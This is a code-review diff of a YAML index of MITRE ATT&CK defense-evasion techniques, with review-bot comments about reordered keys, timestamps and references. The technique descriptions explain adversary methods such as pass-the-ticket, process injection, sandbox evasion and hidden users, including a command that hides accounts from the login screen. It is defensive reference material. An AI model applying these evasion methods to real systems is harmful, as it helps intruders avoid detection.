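Review bot: replacing the `Office 365` and `Google Workspace` platforms with `Office Suite` on T1070 changes what the per-platform index generator sees, and this same diff still touches `atomics/Indexes/Indexes-CSV/google-workspace-index.csv`; check that an `Office Suite` index is produced and that the Office 365 and Google Workspace indexes do not silently keep stale rows for techniques that no longer list those platforms. The version bump to 2.2 matches the platform change.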
@@ -7082,14 +7199,13 @@ defense-evasion:
external_id: T1070
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 3.1.0
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1070
atomic_tests: []
T1550.003:
technique:
- modified: '2023-10-31T14:00:00.188Z'
+ modified: '2024-09-12T15:21:09.330Z'
name: 'Use Alternate Authentication Material: Pass the Ticket'
description: |-
Adversaries may “pass the ticket” using stolen Kerberos tickets to move laterally within an environment, bypassing normal system access controls. Pass the ticket (PtT) is a method of authenticating to a system using Kerberos tickets without having access to an account's password. Kerberos authentication can be used as the first step to lateral movement to a remote system.
@@ -7109,6 +7225,7 @@ defense-evasion:
x_mitre_contributors:
- Vincent Le Toux
- Ryan Becwar
+ x_mitre_deprecated: false
x_mitre_detection: |-
Audit all Kerberos authentication and credential use events and review for discrepancies. Unusual remote authentication events that correlate with other suspicious activity (such as writing and executing binaries) may indicate malicious activity.
@@ -7116,7 +7233,6 @@ defense-evasion:
x_mitre_domains:
- enterprise-attack
x_mitre_is_subtechnique: true
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_platforms:
- Windows
x_mitre_version: '1.1'
@@ -7132,34 +7248,35 @@ defense-evasion:
id: attack-pattern--7b211ac6-c815-4189-93a9-ab415deca926
created: '2020-01-30T17:03:43.072Z'
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
external_references:
- source_name: mitre-attack
url: https://attack.mitre.org/techniques/T1550/003
external_id: T1550.003
- - source_name: ADSecurity AD Kerberos Attacks
- description: Metcalf, S. (2014, November 22). Mimikatz and Active Directory
- Kerberos Attacks. Retrieved June 2, 2016.
- url: https://adsecurity.org/?p=556
- - source_name: GentilKiwi Pass the Ticket
- description: Deply, B. (2014, January 13). Pass the ticket. Retrieved June
- 2, 2016.
- url: http://blog.gentilkiwi.com/securite/mimikatz/pass-the-ticket-kerberos
+ - source_name: CERT-EU Golden Ticket Protection
+ description: Abolins, D., Boldea, C., Socha, K., Soria-Machado, M. (2016,
+ April 26). Kerberos Golden Ticket Protection. Retrieved July 13, 2017.
+ url: https://cert.europa.eu/static/WhitePapers/UPDATED%20-%20CERT-EU_Security_Whitepaper_2014-007_Kerberos_Golden_Ticket_Protection_v1_4.pdf
- source_name: Campbell 2014
description: Campbell, C. (2014). The Secret Life of Krbtgt. Retrieved December
4, 2014.
url: http://defcon.org/images/defcon-22/dc-22-presentations/Campbell/DEFCON-22-Christopher-Campbell-The-Secret-Life-of-Krbtgt.pdf
+ - source_name: GentilKiwi Pass the Ticket
+ description: Deply, B. (2014, January 13). Pass the ticket. Retrieved September
+ 12, 2024.
+ url: https://web.archive.org/web/20210515214027/https://blog.gentilkiwi.com/securite/mimikatz/pass-the-ticket-kerberos
+ - source_name: ADSecurity AD Kerberos Attacks
+ description: Metcalf, S. (2014, November 22). Mimikatz and Active Directory
+ Kerberos Attacks. Retrieved June 2, 2016.
+ url: https://adsecurity.org/?p=556
- source_name: Stealthbits Overpass-the-Hash
description: Warren, J. (2019, February 26). How to Detect Overpass-the-Hash
Attacks. Retrieved February 4, 2021.
url: https://stealthbits.com/blog/how-to-detect-overpass-the-hash-attacks/
- - source_name: CERT-EU Golden Ticket Protection
- description: Abolins, D., Boldea, C., Socha, K., Soria-Machado, M. (2016,
- April 26). Kerberos Golden Ticket Protection. Retrieved July 13, 2017.
- url: https://cert.europa.eu/static/WhitePapers/UPDATED%20-%20CERT-EU_Security_Whitepaper_2014-007_Kerberos_Golden_Ticket_Protection_v1_4.pdf
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 3.1.0
- spec_version: '2.1'
+ x_mitre_attack_spec_version: 3.2.0
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
identifier: T1550.003
atomic_tests: []
T1036.004:
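Review bot: apart from the added `revoked: false`, the only substantive change in this reference list is the `GentilKiwi Pass the Ticket` entry, whose URL now points at a Wayback Machine snapshot with a refreshed retrieval date (September 12, 2024, matching the new `modified` value); the other three references are deleted and re-added unchanged because the list was reordered. Stable reference ordering in the generator would shrink this hunk to the three changed lines. The `x_mitre_modified_by_ref` removed two hunks earlier reappears at the end of the object, so nothing is lost.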
@@ -7225,7 +7342,6 @@ defense-evasion:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1036.004
atomic_tests: []
T1055.004:
@@ -7264,7 +7380,7 @@ defense-evasion:
A Technical Survey Of Common And Trending Process Injection Techniques.
Retrieved December 7, 2017.'
source_name: Elastic Process Injection July 2017
- modified: '2022-04-25T14:00:00.188Z'
+ modified: '2021-10-18T12:23:46.476Z'
name: 'Process Injection: Asynchronous Procedure Call'
description: "Adversaries may inject malicious code into processes via the asynchronous
procedure call (APC) queue in order to evade process-based defenses as well
@@ -7313,8 +7429,6 @@ defense-evasion:
x_mitre_defense_bypassed:
- Application control
- Anti-virus
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
identifier: T1055.004
atomic_tests: []
T1647:
@@ -7365,7 +7479,7 @@ defense-evasion:
pairs to insert environment variables, such as LSEnvironment
,
to enable persistence via [Dynamic Linker Hijacking](https://attack.mitre.org/techniques/T1574/006).(Citation:
wardle chp2 persistence)(Citation: eset_osx_flashback)"
- modified: '2022-05-11T14:00:00.188Z'
+ modified: '2022-04-20T22:00:33.375Z'
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
name: Plist File Modification
x_mitre_detection: "Monitor for common command-line editors used to modify plist
@@ -7386,7 +7500,6 @@ defense-evasion:
- 'File: File Modification'
x_mitre_attack_spec_version: 2.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1647
atomic_tests: []
T1553.005:
@@ -7453,7 +7566,6 @@ defense-evasion:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1553.005
atomic_tests: []
T1600.002:
@@ -7476,7 +7588,7 @@ defense-evasion:
url: https://community.cisco.com/t5/security-blogs/attackers-continue-to-target-legacy-devices/ba-p/4169954
description: Omar Santos. (2020, October 19). Attackers Continue to Target
Legacy Devices. Retrieved October 20, 2020.
- modified: '2021-04-29T14:49:39.188Z'
+ modified: '2020-10-21T22:37:48.503Z'
name: Disable Crypto Hardware
description: |-
Adversaries disable a network device’s dedicated hardware encryption, which may enable them to leverage weaknesses in software encryption in order to reduce the effort involved in collecting, manipulating, and exfiltrating transmitted data.
@@ -7497,8 +7609,6 @@ defense-evasion:
- 'File: File Modification'
x_mitre_permissions_required:
- Administrator
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
atomic_tests: []
T1542:
technique:
@@ -7559,11 +7669,10 @@ defense-evasion:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1612:
technique:
- modified: '2023-05-09T14:00:00.188Z'
+ modified: '2023-04-15T16:22:09.807Z'
name: Build Image on Host
description: "Adversaries may build a container image directly on a host to
bypass defenses that monitor for the retrieval of malicious images from a
@@ -7628,7 +7737,6 @@ defense-evasion:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1612
atomic_tests: []
T1055.002:
@@ -7652,7 +7760,7 @@ defense-evasion:
A Technical Survey Of Common And Trending Process Injection Techniques.
Retrieved December 7, 2017.'
source_name: Elastic Process Injection July 2017
- modified: '2022-04-25T14:00:00.188Z'
+ modified: '2021-10-18T12:21:11.178Z'
name: 'Process Injection: Portable Executable Injection'
description: "Adversaries may inject portable executables (PE) into processes
in order to evade process-based defenses as well as possibly elevate privileges.
@@ -7696,8 +7804,6 @@ defense-evasion:
- Application control
x_mitre_permissions_required:
- User
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
identifier: T1055.002
atomic_tests: []
T1218.012:
@@ -7753,7 +7859,7 @@ defense-evasion:
not account for its potential abuse.(Citation: LOLBAS Verclsid)(Citation:
Red Canary Verclsid.exe)(Citation: BOHOPS Abusing the COM Registry)(Citation:
Nick Tyrer GitHub) "
- modified: '2022-10-25T14:00:00.188Z'
+ modified: '2022-05-20T17:35:28.221Z'
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
name: Verclsid
x_mitre_detection: Use process monitoring to monitor the execution and arguments
@@ -7777,7 +7883,6 @@ defense-evasion:
- Digital Certificate Validation
x_mitre_attack_spec_version: 2.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1562.010:
technique:
@@ -7868,40 +7973,11 @@ defense-evasion:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1562.010
atomic_tests: []
T1497:
technique:
- x_mitre_platforms:
- - Windows
- - macOS
- - Linux
- x_mitre_domains:
- - enterprise-attack
- x_mitre_contributors:
- - Deloitte Threat Library Team
- - Sunny Neo
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- id: attack-pattern--82caa33e-d11a-433a-94ea-9b5a5fbef81d
- type: attack-pattern
- created: '2019-04-17T22:22:24.505Z'
- created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- external_references:
- - source_name: mitre-attack
- external_id: T1497
- url: https://attack.mitre.org/techniques/T1497
- - source_name: Deloitte Environment Awareness
- url: https://drive.google.com/file/d/1t0jn3xr4ff2fR30oQAUn_RsWSnMpOAQc
- description: Torello, A. & Guibernau, F. (n.d.). Environment Awareness. Retrieved
- May 18, 2021.
- - source_name: Unit 42 Pirpi July 2015
- url: https://unit42.paloaltonetworks.com/ups-observations-on-cve-2015-3113-prior-zero-days-and-the-pirpi-payload/
- description: 'Falcone, R., Wartell, R.. (2015, July 27). UPS: Observations
- on CVE-2015-3113, Prior Zero-Days and the Pirpi Payload. Retrieved April
- 23, 2019.'
- modified: '2022-04-25T14:00:00.188Z'
+ modified: '2024-09-12T15:50:18.049Z'
name: Virtualization/Sandbox Evasion
description: |+
Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.(Citation: Deloitte Environment Awareness)
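Review bot: the block of deleted lines here is not a removal: every field (platforms, domains, contributors, marking refs, id, type, created, created_by_ref, external_references) is re-emitted later in the same T1497 object in a different key order, and the only real changes in the whole object are the `modified` timestamp (which, unlike most objects in this diff, moves forward, to 2024-09-12) and the Deloitte reference's URL and retrieval date. Emitting keys in a fixed order from the generator would make future diffs of this file show only real changes; as it stands a reviewer has to reconcile the object by hand to confirm nothing was dropped.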
@@ -7913,6 +7989,10 @@ defense-evasion:
phase_name: defense-evasion
- kill_chain_name: mitre-attack
phase_name: discovery
+ x_mitre_contributors:
+ - Deloitte Threat Library Team
+ - Sunny Neo
+ x_mitre_deprecated: false
x_mitre_detection: Virtualization, sandbox, user activity, and related discovery
techniques will likely occur in the first steps of an operation but may also
occur throughout as an adversary learns the environment. Data and events should
@@ -7923,8 +8003,14 @@ defense-evasion:
required. Monitoring for suspicious processes being spawned that gather a
variety of system information or perform other forms of Discovery, especially
in a short period of time, may aid in detection.
+ x_mitre_domains:
+ - enterprise-attack
+ x_mitre_is_subtechnique: false
+ x_mitre_platforms:
+ - Windows
+ - macOS
+ - Linux
x_mitre_version: '1.3'
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_data_sources:
- 'Command: Command Execution'
- 'Process: Process Creation'
@@ -7934,9 +8020,28 @@ defense-evasion:
- Host forensic analysis
- Signature-based detection
- Static File Analysis
- x_mitre_is_subtechnique: false
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
+ type: attack-pattern
+ id: attack-pattern--82caa33e-d11a-433a-94ea-9b5a5fbef81d
+ created: '2019-04-17T22:22:24.505Z'
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
+ external_references:
+ - source_name: mitre-attack
+ url: https://attack.mitre.org/techniques/T1497
+ external_id: T1497
+ - source_name: Unit 42 Pirpi July 2015
+ description: 'Falcone, R., Wartell, R.. (2015, July 27). UPS: Observations
+ on CVE-2015-3113, Prior Zero-Days and the Pirpi Payload. Retrieved April
+ 23, 2019.'
+ url: https://unit42.paloaltonetworks.com/ups-observations-on-cve-2015-3113-prior-zero-days-and-the-pirpi-payload/
+ - source_name: Deloitte Environment Awareness
+ description: Torello, A. & Guibernau, F. (n.d.). Environment Awareness. Retrieved
+ September 13, 2024.
+ url: https://drive.google.com/file/d/1t0jn3xr4ff2fR30oQAUn_RsWSnMpOAQc/edit
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ x_mitre_attack_spec_version: 3.2.0
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
atomic_tests: []
T1218.005:
technique:
@@ -7989,7 +8094,7 @@ defense-evasion:
- source_name: LOLBAS Mshta
url: https://lolbas-project.github.io/lolbas/Binaries/Mshta/
description: LOLBAS. (n.d.). Mshta.exe. Retrieved July 31, 2019.
- modified: '2022-05-11T14:00:00.188Z'
+ modified: '2022-03-11T20:38:28.802Z'
name: 'Signed Binary Proxy Execution: Mshta'
description: "Adversaries may abuse mshta.exe to proxy execution of malicious
.hta files and Javascript or VBScript through a trusted Windows utility. There
@@ -8027,68 +8132,72 @@ defense-evasion:
- Digital Certificate Validation
x_mitre_permissions_required:
- User
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
identifier: T1218.005
atomic_tests: []
T1480:
technique:
+ modified: '2024-06-07T14:30:23.491Z'
+ name: Execution Guardrails
+ description: |-
+ Adversaries may use execution guardrails to constrain execution or actions based on adversary supplied and environment specific conditions that are expected to be present on the target. Guardrails ensure that a payload only executes against an intended target and reduces collateral damage from an adversary’s campaign.(Citation: FireEye Kevin Mandia Guardrails) Values an adversary can provide about a target system or environment to use as guardrails may include specific network share names, attached physical devices, files, joined Active Directory (AD) domains, and local/external IP addresses.(Citation: FireEye Outlook Dec 2019)
+
+ Guardrails can be used to prevent exposure of capabilities in environments that are not intended to be compromised or operated within. This use of guardrails is distinct from typical [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497). While use of [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) may involve checking for known sandbox values and continuing with execution only if there is no match, the use of guardrails will involve checking for an expected target-specific value and only continuing with execution if there is such a match.
+
+ Adversaries may identify and block certain user-agents to evade defenses and narrow the scope of their attack to victims and platforms on which it will be most effective. A user-agent self-identifies data such as a user's software application, operating system, vendor, and version. Adversaries may check user-agents for operating system identification and then only serve malware for the exploitable software while ignoring all other operating systems.(Citation: Trellix-Qakbot)
+ kill_chain_phases:
+ - kill_chain_name: mitre-attack
+ phase_name: defense-evasion
+ x_mitre_contributors:
+ - Nick Carr, Mandiant
+ x_mitre_deprecated: false
+ x_mitre_detection: Detecting the use of guardrails may be difficult depending
+ on the implementation. Monitoring for suspicious processes being spawned that
+ gather a variety of system information or perform other forms of [Discovery](https://attack.mitre.org/tactics/TA0007),
+ especially in a short period of time, may aid in detection.
+ x_mitre_domains:
+ - enterprise-attack
+ x_mitre_is_subtechnique: false
x_mitre_platforms:
- Linux
- macOS
- Windows
- x_mitre_domains:
- - enterprise-attack
- x_mitre_contributors:
- - Nick Carr, Mandiant
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ x_mitre_version: '1.2'
+ x_mitre_data_sources:
+ - 'Process: Process Creation'
+ - 'Command: Command Execution'
+ x_mitre_defense_bypassed:
+ - Anti-virus
+ - Host Forensic Analysis
+ - Signature-based Detection
+ - Static File Analysis
type: attack-pattern
id: attack-pattern--853c4192-4311-43e1-bfbb-b11b14911852
created: '2019-01-31T02:10:08.261Z'
- x_mitre_version: '1.1'
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
external_references:
- source_name: mitre-attack
- external_id: T1480
url: https://attack.mitre.org/techniques/T1480
+ external_id: T1480
- source_name: FireEye Outlook Dec 2019
- url: https://www.fireeye.com/blog/threat-research/2019/12/breaking-the-rules-tough-outlook-for-home-page-attacks.html
description: 'McWhirt, M., Carr, N., Bienstock, D. (2019, December 4). Breaking
the Rules: A Tough Outlook for Home Page Attacks (CVE-2017-11774). Retrieved
June 23, 2020.'
+ url: https://www.fireeye.com/blog/threat-research/2019/12/breaking-the-rules-tough-outlook-for-home-page-attacks.html
+ - source_name: Trellix-Qakbot
+ description: Pham Duy Phuc, John Fokker J.E., Alejandro Houspanossian and
+ Mathanraj Thangaraju. (2023, March 7). Qakbot Evolves to OneNote Malware
+ Distribution. Retrieved June 7, 2024.
+ url: https://www.trellix.com/blogs/research/qakbot-evolves-to-onenote-malware-distribution/
- source_name: FireEye Kevin Mandia Guardrails
- url: https://www.cyberscoop.com/kevin-mandia-fireeye-u-s-malware-nice/
description: Shoorbajee, Z. (2018, June 1). Playing nice? FireEye CEO says
U.S. malware is more restrained than adversaries'. Retrieved January 17,
2019.
- x_mitre_deprecated: false
- revoked: false
- description: |-
- Adversaries may use execution guardrails to constrain execution or actions based on adversary supplied and environment specific conditions that are expected to be present on the target. Guardrails ensure that a payload only executes against an intended target and reduces collateral damage from an adversary’s campaign.(Citation: FireEye Kevin Mandia Guardrails) Values an adversary can provide about a target system or environment to use as guardrails may include specific network share names, attached physical devices, files, joined Active Directory (AD) domains, and local/external IP addresses.(Citation: FireEye Outlook Dec 2019)
-
- Guardrails can be used to prevent exposure of capabilities in environments that are not intended to be compromised or operated within. This use of guardrails is distinct from typical [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497). While use of [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) may involve checking for known sandbox values and continuing with execution only if there is no match, the use of guardrails will involve checking for an expected target-specific value and only continuing with execution if there is such a match.
- modified: '2022-05-24T14:00:00.188Z'
- created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- name: Execution Guardrails
- x_mitre_detection: Detecting the use of guardrails may be difficult depending
- on the implementation. Monitoring for suspicious processes being spawned that
- gather a variety of system information or perform other forms of [Discovery](https://attack.mitre.org/tactics/TA0007),
- especially in a short period of time, may aid in detection.
- kill_chain_phases:
- - kill_chain_name: mitre-attack
- phase_name: defense-evasion
- x_mitre_is_subtechnique: false
- x_mitre_data_sources:
- - 'Process: Process Creation'
- - 'Command: Command Execution'
- x_mitre_defense_bypassed:
- - Anti-virus
- - Host Forensic Analysis
- - Signature-based Detection
- - Static File Analysis
- x_mitre_attack_spec_version: 2.1.0
+ url: https://www.cyberscoop.com/kevin-mandia-fireeye-u-s-malware-nice/
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1134.001:
technique:
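Review bot: underneath the key reordering, the real changes to T1480 are a new third description paragraph on user-agent based targeting, the matching `Trellix-Qakbot` reference, `x_mitre_version` 1.1 to 1.2, and `x_mitre_attack_spec_version` 2.1.0 to 3.2.0; these line up with `modified: 2024-06-07` and the reference's "Retrieved June 7, 2024". One thing to confirm: the new paragraph describes a server-side check on the victim's user-agent, which neither listed data source (`Process: Process Creation`, `Command: Command Execution`) would observe, and the detection text still only covers host-side discovery; if the data sources were not carried over verbatim from upstream, a network content source belongs here as well.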
@@ -8146,7 +8255,6 @@ defense-evasion:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1134.001
atomic_tests: []
T1205.001:
@@ -8172,7 +8280,7 @@ defense-evasion:
description: 'Hartrell, Greg. (2002, August). Get a handle on cd00r: The invisible
backdoor. Retrieved October 13, 2018.'
source_name: Hartrell cd00r 2002
- modified: '2022-05-11T14:00:00.188Z'
+ modified: '2022-03-11T18:31:23.996Z'
name: Port Knocking
description: |-
Adversaries may use port knocking to hide open ports used for persistence or command and control. To enable a port, an adversary sends a series of attempted connections to a predefined sequence of closed ports. After the sequence is completed, opening a port is often accomplished by the host based firewall, but could also be implemented by custom software.
@@ -8197,8 +8305,6 @@ defense-evasion:
- 'Network Traffic: Network Traffic Flow'
x_mitre_permissions_required:
- User
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
atomic_tests: []
T1027.012:
technique:
@@ -8259,7 +8365,6 @@ defense-evasion:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1564.002:
technique:
@@ -8332,7 +8437,7 @@ defense-evasion:
sudo -u gdm gsettings set org.gnome.login-screen disable-user-list true
).(Citation:
Hide GDM User Accounts) Display Managers are not anchored to specific distributions
and may be changed by a user or adversary."
- modified: '2022-05-11T14:00:00.188Z'
+ modified: '2022-04-19T02:31:01.315Z'
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
name: 'Hide Artifacts: Hidden Users'
x_mitre_detection: "Monitor for users that may be hidden from the login screen
@@ -8361,7 +8466,6 @@ defense-evasion:
- 'User Account: User Account Metadata'
x_mitre_attack_spec_version: 2.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1564.002
atomic_tests: []
T1134.003:
@@ -8425,11 +8529,10 @@ defense-evasion:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1562.003:
technique:
- modified: '2023-05-09T14:00:00.188Z'
+ modified: '2023-03-30T21:01:47.940Z'
name: 'Impair Defenses: Impair Command History Logging'
description: "Adversaries may impair command history logging to hide commands
they run on a compromised system. Various command interpreters keep track
@@ -8514,12 +8617,11 @@ defense-evasion:
url: https://community.sophos.com/products/malware/b/blog/posts/powershell-command-history-forensics
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- spec_version: '2.1'
identifier: T1562.003
atomic_tests: []
T1556.008:
technique:
- modified: '2023-10-31T14:00:00.188Z'
+ modified: '2023-05-04T18:02:51.318Z'
name: Network Provider DLL
description: "Adversaries may register malicious network provider dynamic link
libraries (DLLs) to capture cleartext user credentials during the authentication
@@ -8594,45 +8696,10 @@ defense-evasion:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1497.002:
technique:
- x_mitre_platforms:
- - Linux
- - macOS
- - Windows
- x_mitre_domains:
- - enterprise-attack
- x_mitre_contributors:
- - Deloitte Threat Library Team
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- id: attack-pattern--91541e7e-b969-40c6-bbd8-1b5352ec2938
- type: attack-pattern
- created: '2020-03-06T21:04:12.454Z'
- created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- external_references:
- - source_name: mitre-attack
- external_id: T1497.002
- url: https://attack.mitre.org/techniques/T1497/002
- - source_name: Deloitte Environment Awareness
- url: https://drive.google.com/file/d/1t0jn3xr4ff2fR30oQAUn_RsWSnMpOAQc
- description: Torello, A. & Guibernau, F. (n.d.). Environment Awareness. Retrieved
- May 18, 2021.
- - source_name: Sans Virtual Jan 2016
- url: https://www.sans.org/reading-room/whitepapers/forensics/detecting-malware-sandbox-evasion-techniques-36667
- description: Keragala, D. (2016, January 16). Detecting Malware and Sandbox
- Evasion Techniques. Retrieved April 17, 2019.
- - source_name: Unit 42 Sofacy Nov 2018
- url: https://unit42.paloaltonetworks.com/unit42-sofacy-continues-global-attacks-wheels-new-cannon-trojan/
- description: Falcone, R., Lee, B.. (2018, November 20). Sofacy Continues Global
- Attacks and Wheels Out New ‘Cannon’ Trojan. Retrieved April 23, 2019.
- - url: https://www.fireeye.com/blog/threat-research/2017/04/fin7-phishing-lnk.html
- description: Carr, N., et al. (2017, April 24). FIN7 Evolution and the Phishing
- LNK. Retrieved April 24, 2017.
- source_name: FireEye FIN7 April 2017
- modified: '2022-04-25T14:00:00.188Z'
+ modified: '2024-09-12T15:50:18.050Z'
name: User Activity Based Checks
description: "Adversaries may employ various user activity checks to detect
and avoid virtualization and analysis environments. This may include changing
@@ -8656,6 +8723,9 @@ defense-evasion:
phase_name: defense-evasion
- kill_chain_name: mitre-attack
phase_name: discovery
+ x_mitre_contributors:
+ - Deloitte Threat Library Team
+ x_mitre_deprecated: false
x_mitre_detection: 'User activity-based checks will likely occur in the first
steps of an operation but may also occur throughout as an adversary learns
the environment. Data and events should not be viewed in isolation, but as
@@ -8666,9 +8736,14 @@ defense-evasion:
processes being spawned that gather a variety of system information or perform
other forms of Discovery, especially in a short period of time, may aid in
detection. '
+ x_mitre_domains:
+ - enterprise-attack
x_mitre_is_subtechnique: true
+ x_mitre_platforms:
+ - Linux
+ - macOS
+ - Windows
x_mitre_version: '1.1'
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_data_sources:
- 'Process: OS API Execution'
- 'Process: Process Creation'
@@ -8678,8 +8753,35 @@ defense-evasion:
- Static File Analysis
- Signature-based detection
- Host forensic analysis
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
+ type: attack-pattern
+ id: attack-pattern--91541e7e-b969-40c6-bbd8-1b5352ec2938
+ created: '2020-03-06T21:04:12.454Z'
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
+ external_references:
+ - source_name: mitre-attack
+ url: https://attack.mitre.org/techniques/T1497/002
+ external_id: T1497.002
+ - source_name: FireEye FIN7 April 2017
+ description: Carr, N., et al. (2017, April 24). FIN7 Evolution and the Phishing
+ LNK. Retrieved April 24, 2017.
+ url: https://www.fireeye.com/blog/threat-research/2017/04/fin7-phishing-lnk.html
+ - source_name: Unit 42 Sofacy Nov 2018
+ description: Falcone, R., Lee, B.. (2018, November 20). Sofacy Continues Global
+ Attacks and Wheels Out New ‘Cannon’ Trojan. Retrieved April 23, 2019.
+ url: https://unit42.paloaltonetworks.com/unit42-sofacy-continues-global-attacks-wheels-new-cannon-trojan/
+ - source_name: Sans Virtual Jan 2016
+ description: Keragala, D. (2016, January 16). Detecting Malware and Sandbox
+ Evasion Techniques. Retrieved April 17, 2019.
+ url: https://www.sans.org/reading-room/whitepapers/forensics/detecting-malware-sandbox-evasion-techniques-36667
+ - source_name: Deloitte Environment Awareness
+ description: Torello, A. & Guibernau, F. (n.d.). Environment Awareness. Retrieved
+ September 13, 2024.
+ url: https://drive.google.com/file/d/1t0jn3xr4ff2fR30oQAUn_RsWSnMpOAQc/edit
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ x_mitre_attack_spec_version: 3.2.0
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
atomic_tests: []
T1134.004:
technique:
